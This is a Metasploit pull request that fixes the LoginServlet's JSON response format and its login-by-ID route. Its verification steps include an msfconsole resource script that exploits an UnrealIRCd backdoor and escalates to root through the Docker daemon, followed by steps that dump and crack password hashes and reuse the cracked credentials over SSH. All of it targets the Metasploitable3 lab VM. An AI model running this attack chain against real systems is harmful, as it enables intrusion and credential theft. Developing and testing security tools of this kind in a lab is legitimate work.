### PR TITLE
Fix LoginServlet to meet API standards and documented functionality

### DIFF
--- a/lib/msf/core/web_services/servlet/login_servlet.rb
+++ b/lib/msf/core/web_services/servlet/login_servlet.rb
@@ -9,7 +9,7 @@ module LoginServlet
   end
 
   def self.registered(app)
-    app.get LoginServlet.api_path, &get_logins
+    app.get LoginServlet.api_path_with_id, &get_logins
     app.post LoginServlet.api_path, &create_login
     app.put LoginServlet.api_path_with_id, &update_login
     app.delete LoginServlet.api_path, &delete_logins

--- a/lib/msf/core/web_services/servlet/login_servlet.rb
+++ b/lib/msf/core/web_services/servlet/login_servlet.rb
@@ -25,7 +25,7 @@ module LoginServlet
         sanitized_params = sanitize_params(params, env['rack.request.query_hash'])
         data = get_db.logins(sanitized_params)
         data = data.first if is_single_object?(data, sanitized_params)
-        set_json_response(data)
+        set_json_data_response(response: data)
       rescue => e
         print_error_and_create_response(error: e, message: 'There was an error retrieving logins:', code: 500)
       end
@@ -38,8 +38,8 @@ module LoginServlet
         opts = parse_json_request(request, false)
         opts[:core][:workspace] = get_db.workspaces(id: opts[:workspace_id]).first
         opts[:core] = get_db.creds(opts[:core]).first
-        response = get_db.create_credential_login(opts)
-        set_json_response(response)
+        data = get_db.create_credential_login(opts)
+        set_json_data_response(response: data)
       rescue => e
         print_error_and_create_response(error: e, message: 'There was an error creating the login:', code: 500)
       end
@@ -53,7 +53,7 @@ module LoginServlet
         tmp_params = sanitize_params(params)
         opts[:id] = tmp_params[:id] if tmp_params[:id]
         data = get_db.update_login(opts)
-        set_json_response(data)
+        set_json_data_response(response: data)
       rescue => e
         print_error_and_create_response(error: e, message: 'There was an error updating the login:', code: 500)
       end
@@ -65,7 +65,7 @@ module LoginServlet
       begin
         opts = parse_json_request(request, false)
         data = get_db.delete_logins(opts)
-        set_json_response(data)
+        set_json_data_response(response: data)
       rescue => e
         print_error_and_create_response(error: e, message: 'There was an error deleting the logins:', code: 500)
       end


### PR DESCRIPTION
This fixes the `LoginServlet`, introduced in #10176, to meet API standards and documented functionality.

1. The `LoginServlet` uses `set_json_response(data)` rather than `set_json_data_response(response: data)` like the other servlets and therefore the response lacks the `data` object wrapper in the JSON response.

**GET response from logins endpoint without records:**
```
[]
```

**GET response from another model endpoint without records:**
```
{
  "data": []
}
```

2. `/api/v1/logins/<ID>`, although documented in the OpenAPI documentation at `https://localhost:8080/api/v1/api-docs`, does not return a valid response:

**Response:**
```
<h1>Not Found</h1>
```

Ticket: MS-3706

## Verification

Note, the verification steps are mostly duplicated from #10176.

### Test login modules

The following steps will create and update login records.

- [ ] Set up [Metasploitable3](https://github.com/rapid7/metasploitable3) VM for testing
- [ ] Start `msfconsole`
- [ ] Create one or more valid credentials for Metasploitable3, for example, `creds add user:vagrant password:vagrant`
- [ ] Test a successful login against a service
  - [ ] `use auxiliary/scanner/ssh/ssh_login`
  - [ ] `set RHOSTS <IP address of Metasploitable3>`
  - [ ] `set DB_ALL_CREDS true` to use the credential pairs stored in the database. Ensure valid credentials are displayed when running the `creds` command.
  - [ ] `run`
  - [ ] **Verify** the login attempt is displayed for the credential by running the `creds` command.
- [ ] Test that logins are updated properly
  - [ ] `use auxiliary/scanner/ssh/ssh_login`
  - [ ] `set RHOSTS <IP address of Metasploitable3>`
  - [ ] `set DB_ALL_CREDS true` to use the credential pairs stored in the database. Ensure invalid credentials are displayed when running the `creds` command.
  - [ ] `run`
  - [ ] **Verify** the login attempt is displayed for the credential by running the `creds` command.
  - [ ] Turn off Metasploitable3 and `run` the module again to get a failed attempt.
  - [ ] Verify the login attempt displays for the credential. You may need to use the API for this because it is not displayed in the UI. I recommend using the GET command under Logins at `http://localhost:8080/api/v1/api-docs`. The login record should show a `status` of `Unable to connect`

### Test JTR modules

The following steps will create and update login records.

- [ ] Create the following RC script:
```
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST <IP address of Metasploitable3>
set RPORT 6697
exploit -z
sleep 5
sessions -u 1
sleep 5
use exploit/linux/local/docker_daemon_privilege_escalation
set SESSION 2
set LHOST <IP of listening address>
set LPORT 4445
exploit
```
- [ ] Set up [Metasploitable3](https://github.com/rapid7/metasploitable3) VM for testing
- [ ] Start `msfconsole`
- [ ] Run the RC script `resource <RC Script Name>.rc`
- [ ] Verify you get a root shell and then background it
- [ ] Gather Dump Password Hashes
  - [ ] `use post/linux/gather/hashdump`
  - [ ] `set SESSION <root session ID>`
  - [ ] `run`
- [ ] Crack the hashes using John the Ripper Linux Password Cracker
  - [ ] `use auxiliary/analyze/jtr_linux`
  - [ ] Create a custom wordlist with at least `Pr0t0c07`
  - [ ] `set CUSTOM_WORDLIST <wordlist file name>`
  - [ ] `set USE_DEFAULT_WORDLIST false`
  - [ ] `set USE_ROOT_WORDS false`
  - [ ] `run` - this should successfully crack the `c_three_pio` hash
- [ ] **Verify** the cracked creds are present when you run the `creds` command
- [ ] Test successful logins against a service using the newly cracked creds
  - [ ] `use auxiliary/scanner/ssh/ssh_login`
  - [ ] `set RHOSTS <IP address of Metasploitable3>`
  - [ ] `set DB_ALL_CREDS true` to use the credential pairs stored in the database.
  - [ ] `run`
  - [ ] **Verify** the login attempts are displayed for the credentials by running the `creds` command.

### Verify the content in the API docs
- [ ] **Verify** the Logins endpoints using the Swagger UI to ensure they are working correctly
